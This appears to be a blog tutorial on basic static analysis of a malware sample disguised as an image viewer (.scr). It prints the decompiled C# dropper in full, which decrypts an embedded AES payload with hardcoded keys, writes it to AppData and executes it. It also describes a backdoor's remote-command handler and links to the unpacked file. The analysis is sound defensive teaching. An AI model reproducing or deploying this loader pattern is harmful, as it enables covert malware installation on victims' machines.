Basic analysis

Hi.

Today we're going to do a basic analysis on a some virus. In the last note I mentioned you have two ways to analyze viruses, malwares etc:

• basic analysis
• dynamic analysis

Dynamic analysis is very simple, because you only run suspect file and watch its behavior using variety programs like: Wireshark, RegShot, etc. Today I won't be explaining how to use dynamic analysis though. Ok so let's start. The suspect file is called IMG_PhotoView_SAM68403(1).scr and this file we load to Exeinfo PE, however you can use PEiD, but I'm using Exeinfo PE and we see this file is written in C# so we can load into .NET Reflector and we can see code:

internal class Program
{
    // Fields
    private string f;

    // Methods
    private static void Main(string[] args)
    {
        try
        {
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string str2 = File.ReadAllText(Process.GetCurrentProcess().MainModule.FileName);
            string[] separator = new string[] { "[024578974asf6843sr6g87g67]" };
            string[] strArray2 = str2.Split(separator, StringSplitOptions.None);
            byte[] bytes = UnSecure(Convert.FromBase64String(strArray2[1]));
            File.WriteAllBytes(folderPath + @"\" + strArray2[2], bytes);
            Process.Start(folderPath + @"\" + strArray2[2]);
        }
        catch
        {
        }
    }

    private static byte[] UnSecure(byte[] data)
    {
        RijndaelManaged managed = new RijndaelManaged();
        byte[] buffer = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7 };
        byte[] buffer2 = new byte[] { 7, 6, 5, 4, 3, 2, 1, 9, 8, 7, 6, 5, 4, 3, 2, 1 };
        managed.IV = buffer;
        managed.Key = buffer2;
        return managed.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
    }
}

Since we already have a code we're also able to copy it, but remember we need to remove a function Process.Start and change path to our suspect file then we can execute our program and we get in my case file is called: lkjyhgtrt.exe which is written in Delphi. So let's load into IDA, but before beginning analysis I recommend to use signatures in IDA. It'll make the analysis simpler and easier. The main goal is to find some functions like: connect to server/ftp/irc, download file, create a new thread etc. Interesting function for us is at address: 0x00493DAC. The function checks a command returned from an attacker server and then executes it. There are a lot of implemented commands for example:

And example function:

And one more thing could be interesting this suspect file contains in its resources a meme, you can use Resource Hacker and see it, but the virus loads this meme and shows it but I don't encourage to run virus only for see this meme :>

Ok that's all. If you have any questions you're welcome to post it in comments.

Link to unpacked file: link